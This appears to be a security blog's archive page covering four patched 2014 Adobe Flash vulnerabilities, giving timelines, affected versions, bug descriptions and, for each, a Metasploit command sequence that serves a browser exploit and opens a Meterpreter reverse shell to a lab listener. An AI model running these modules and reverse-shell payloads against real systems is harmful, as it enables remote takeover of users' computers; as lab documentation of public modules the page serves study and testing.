Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2014-8440 Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory

Timeline :

Vulnerability discovered by bilou and reported to Verisign’s iDefense VCP
Vulnerability reported to the vendor by Verisign’s iDefense VCP the 2014-09-03
Patched by the vendor via APSB14-24 the 2014–11-11
Vulnerability reported integrated into exploit kits the 2014-11-20
Metasploit PoC provided the 2015–04-30

PoC provided by :

Nicolas Joly (bilou ?)
Unknown
juan vazquez

Reference(s) :

CVE-2014-8440
APSB14-24

Affected version(s) :

Adobe Flash Player 15.0.0.189 and earlier versions
Adobe Flash Player 13.0.0.250 and earlier 13.x versions
Adobe Flash Player 11.2.202.411 and earlier versions for Linux
Adobe AIR desktop runtime 15.0.0.293 and earlier versions
Adobe AIR SDK 15.0.0.302 and earlier versions
Adobe AIR SDK & Compiler 15.0.0.302 and earlier versions
Adobe AIR 15.0.0.293 and earlier versions for Android

Tested on :

with Adobe Flash Player 15.0.0.189 and Internet Explorer 11 on Windows 7 SP1

Description :

This module exploits an unintialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 15.0.0.189.

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

CVE-2014-0569 Adobe Flash Player casi32 Integer Overflow

Timeline :

Vulnerability discovered by bilou and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2014-09-10
Patched by the vendor via APSB14-22 the 2014–10-14
Vulnerability reported integrated into exploit kits the 2014-10-21
Metasploit PoC provided the 2015–04-10

PoC provided by :

bilou
juan vazquez

Reference(s) :

CVE-2014-0569
APSB14-22
ZDI-14-365

Affected version(s) :

Adobe Flash Player 15.0.0.167 and earlier versions

Tested on :

with Adobe Flash Player 15.0.0.167 and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as domainMemory for the current application domain. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.

Commands :

use exploit/windows/browser/adobe_flash_casi32_int_overflow
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

CVE-2014-0556 Adobe Flash Player copyPixelsToByteArray Method Integer Overflow

Timeline :

Vulnerability discovered by Chris Evans of Project Zero team at Google in 2014-07
Patched by the vendor via APSB14-21 the 2014–09-09
First public PoC provide by hdarwin on Packet Storm the 2014-09-30
Vulnerability reported integrated into exploit kits the 2014-10-20
Metasploit PoC provided the 2015-04-15

PoC provided by :

Chris Evans
Nicolas Joly
hdarwin
juan vazquez

Reference(s) :

CVE-2014-0556
APSB14-21

Affected version(s) :

Adobe Flash Player 14.0.0.179 and earlier versions

Tested on :

with Adobe Flash Player 14.0.0.176 (flashplayer14_0r0_176_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the copyPixelsToByteArray method from the BitmapData object. The position field of the destination ByteArray can be used to cause an integer overflow and write contents out of the ByteArray buffer. This module has been tested successfully on: * Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145, and 14.0.0.125. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 14.0.0.179. * Windows 8.1, Firefox 38.0.5 and Adobe Flash 14.0.0.179.

Commands :

use exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinf

CVE-2014-0515 Adobe Flash Player Shader Buffer Overflow

Timeline :

Vulnerability discovered exploited in the wild in 2014-04-14 by Kaspersky Lab
Patched by the vendor via APSB14-13 the 2014–04-28
Windows Metasploit PoC provided the 2014-05-08
Vulnerability reported integrated into exploit kits the 2014-06-07
Multi platform Metasploit PoC provided the 2015-06-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2014-0515
BID-67092
APSB14-13

Affected version(s) :

Adobe Flash Player 13.0.0.182 and earlier versions for Windows
Adobe Flash Player 13.0.0.201 and earlier versions for Macintosh
Adobe Flash Player 11.2.202.350 and earlier versions for Linux

Tested on :

with Adobe Flash Player 13.0.0.182 (flashplayer13_0r0_182_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on the following operating systems and Flash versions: Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182, Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182, Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182, Linux Mint “Rebecca” (32 bit), Firefox 33.0 and Adobe Flash 11.2.202.350

Commands :

use exploit/multi/browser/adobe_flash_pixel_bender_bof
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo